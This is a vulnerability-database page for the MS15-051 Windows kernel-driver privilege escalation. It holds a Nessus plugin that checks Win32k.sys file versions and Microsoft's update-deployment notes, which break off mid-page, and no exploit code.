Microsoft Windows - Local Privilege Escalation MS15-051
2015-05-18T00:00:00
ID EDB-ID:37049 Type exploitdb Reporter hfiref0x Modified 2015-05-18T00:00:00
Description
Microsoft Windows - Local Privilege Escalation (MS15-051). CVE-2015-1676, CVE-2015-1677, CVE-2015-1678, CVE-2015-1679, CVE-2015-1680, CVE-2015-1701. Local exploit...
{"nessus": [{"lastseen": "2021-01-01T05:43:43", "description": "The version of Windows running on the remote host is affected by\nmultiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist\n due to the Win32k.sys kernel-mode driver improperly\n handling objects in memory. A local attacker can exploit\n this to reveal private address information during a\n function call, resulting in the disclosure of kernel\n memory contents. (CVE-2015-1676, CVE-2015-1677,\n CVE-2015-1678, CVE-2015-1679, CVE-2015-1680)\n\n - A privilege escalation vulnerability exists due to the\n Win32k.sys kernel-mode driver improperly handling\n objects in memory. A local attacker can exploit this\n flaw, via a specially crafted application, to execute\n arbitrary code in kernel mode. This vulnerability is\n reportedly being exploited in the wild. (CVE-2015-1701)", "edition": 26, "published": "2015-05-12T00:00:00", "title": "MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1676", "CVE-2015-1677", "CVE-2015-1679", "CVE-2015-1678", "CVE-2015-1701", "CVE-2015-1680"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS15-051.NASL", "href": "https://www.tenable.com/plugins/nessus/83370", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83370);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\n \"CVE-2015-1676\",\n \"CVE-2015-1677\",\n \"CVE-2015-1678\",\n \"CVE-2015-1679\",\n \"CVE-2015-1680\",\n \"CVE-2015-1701\"\n );\n script_bugtraq_id(\n 74245,\n 74483,\n 74494,\n 74495,\n 74496,\n 74497\n );\n script_xref(name:\"MSFT\", value:\"MS15-051\");\n script_xref(name:\"MSKB\", value:\"3045171\");\n script_xref(name:\"MSKB\", value:\"3057191\");\n script_xref(name:\"MSKB\", value:\"3065979\");\n 
script_xref(name:\"IAVA\", value:\"2015-A-0108\");\n\n script_name(english:\"MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191)\");\n script_summary(english:\"Checks the file version of Win32k.sys.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Windows running on the remote host is affected by\nmultiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist\n due to the Win32k.sys kernel-mode driver improperly\n handling objects in memory. A local attacker can exploit\n this to reveal private address information during a\n function call, resulting in the disclosure of kernel\n memory contents. (CVE-2015-1676, CVE-2015-1677,\n CVE-2015-1678, CVE-2015-1679, CVE-2015-1680)\n\n - A privilege escalation vulnerability exists due to the\n Win32k.sys kernel-mode driver improperly handling\n objects in memory. A local attacker can exploit this\n flaw, via a specially crafted application, to execute\n arbitrary code in kernel mode. This vulnerability is\n reportedly being exploited in the wild. 
(CVE-2015-1701)\");\n # https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37b0306c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-051\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2003, Vista, 2008,\n7, 2008 R2, 8, 2012, 8.1, and 2012 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows ClientCopyImage Win32k Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n 
script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS15-051';\nkb = '3045171';\n\nkbs = make_list('3057191', kb, '3065979');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n# Some of the 2k3 checks could flag XP 64, which is unsupported\nif (\"Windows XP\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"Win32k.sys\", version:\"6.3.9600.17796\", min_version:\"6.3.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 8 / Windows Server 2012\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"Win32k.sys\", version:\"6.2.9200.21457\", min_version:\"6.2.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"Win32k.sys\", version:\"6.2.9200.17343\", min_version:\"6.2.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 7 / Server 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Win32k.sys\", version:\"6.1.7601.23038\", min_version:\"6.1.7601.22000\", 
dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Win32k.sys\", version:\"6.1.7601.18834\", min_version:\"6.1.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Win32k.sys\", version:\"6.0.6002.23680\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Win32k.sys\", version:\"6.0.6002.19372\", min_version:\"6.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows Server 2003\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Win32k.sys\", version:\"5.2.3790.5615\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:47:53", "bulletinFamily": "microsoft", "cvelist": ["CVE-2015-1676", "CVE-2015-1677", "CVE-2015-1679", "CVE-2015-1678", "CVE-2015-1701", "CVE-2015-1680"], "description": "<html><body><p>Resolves vulnerabilities in Windows that could allow remote code execution if a user opens a specially crafted document or could allow elevation of privilege if an attacker logs on locally and runs arbitrary code in kernel mode.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Windows, the Microsoft .NET Framework, Microsoft Office, Microsoft Lync, and Microsoft Silverlight. 
The more severe of these vulnerabilities could allow for one of the following scenarios:<br/><ul class=\"sbody-free_list\"><li>Remote code execution if a user opens a specially crafted document or goes to an untrusted webpage that contains embedded TrueType fonts </li><li>Elevation of privilege if an attacker logs on locally and runs arbitrary code in kernel mode. An attacker could then take the following actions:<br/><ul class=\"sbody-free_list\"><li>Install programs</li><li>View, change, or delete data</li><li>Create new accounts that have full user rights</li></ul></li></ul>An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability cannot be exploited remotely or by anonymous users.<br/></div><h2>Introduction</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS15-051. To learn more about this security bulletin:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"https://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-1\" target=\"_self\">https://www.microsoft.com/security/pc-security/updates.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"https://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">https://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"https://technet.microsoft.com/library/security/ms15-051\" id=\"kb-link-3\" target=\"_self\">https://technet.microsoft.com/library/security/MS15-051</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates:<br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT 
professionals:<br/><a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your Windows-based computer from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country:<br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3>The following article contains additional information about this security update as it relates to individual product versions. The article may contain\u00a0 information about known issues. <ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/3045171\" id=\"kb-link-8\">3045171 </a> MS15-044 and MS15-051: Description of the security updates for Windows font drivers Known issues in security update 3045171:<br/><ul class=\"sbody-free_list\"><li>After you install this security update (3045171), you experience crashes when you use Windows GDI+ to create text outline-based path objects on a computer that's running Windows 7 or an earlier version of Windows.<br/><br/>To resolve this problem, install update 3065979. 
For more information, click the following article number to go to the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3065979\" id=\"kb-link-9\">3065979 </a> \"GsDraw error (1): GenericError\" error occurs and application crashes when you create text outline in Windows</div></li><li>After you install this security update (3045171) on a computer that's running Windows Vista or Windows Server 2008, you may receive an error message that resembles the following for the\u00a0<span class=\"sbody-userinput\">FontCache</span> service in the <span class=\"sbody-userinput\">Services</span> Microsoft Management Console (MMC):<br/><br/><br/><br/><div class=\"sbody-error\">Failed to Read Description. Error Code: 15100<br/></div><br/><br/>When you open <span class=\"sbody-userinput\">FontCache</span> service in the <span class=\"sbody-userinput\">Services</span> MMC, you may receive an error message that resembles the following:<br/><br/><br/><div class=\"sbody-error\">Configuration Manager: A general error occurred<br/><br/>The resource loader failed to find MUI file<br/></div><br/><br/>To resolve this problem, install update 971512. 
For more information, click the following article number to go to the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/971512\" id=\"kb-link-10\">971512 </a> Description of the Windows Graphics, Imaging, and XPS Library </div></li></ul></li></ul><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\">Windows Server 2003 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3045171-x86-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3045171-x64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3045171-ia64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" 
id=\"kb-link-11\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">KB3045171.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Restart requirement</td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Removal information</td><td class=\"sbody-td\">Use the <span class=\"text-base\">Add or Remove </span><span class=\"text-base\">Programs</span> item in <span class=\"text-base\">Control Panel</span>, or use the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB3045171$\\Spuninst folder.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File information</td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-12\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Registry key verification</td><td class=\"sbody-td\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP3\\KB3045171\\Filelist</td></tr></table></div><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3045171-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-13\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-14\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span 
class=\"text-base\">Windows6.0-KB3045171-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3045171-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-15\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. 
Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-16\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3045171-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3045171-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-17\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal 
information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the /Uninstall setup switch. Or, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">System and Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-18\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3045171-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-19\" target=\"_self\">Microsoft Knowledge Base Article 
934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">System and Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows 8 and Windows 8.1 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3045171-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8:<br/><span 
class=\"text-base\">Windows8-RT-KB3045171-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3045171-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3045171-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. 
Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><br/></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3045171-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and then click <span class=\"text-base\">Windows Update</span>. Under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3045171\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 3045171</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h4 class=\"sbody-h4\">Windows RT and Windows RT 8.1 (all editions)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">These updates are available through <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-25\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <span class=\"text-base\">Control 
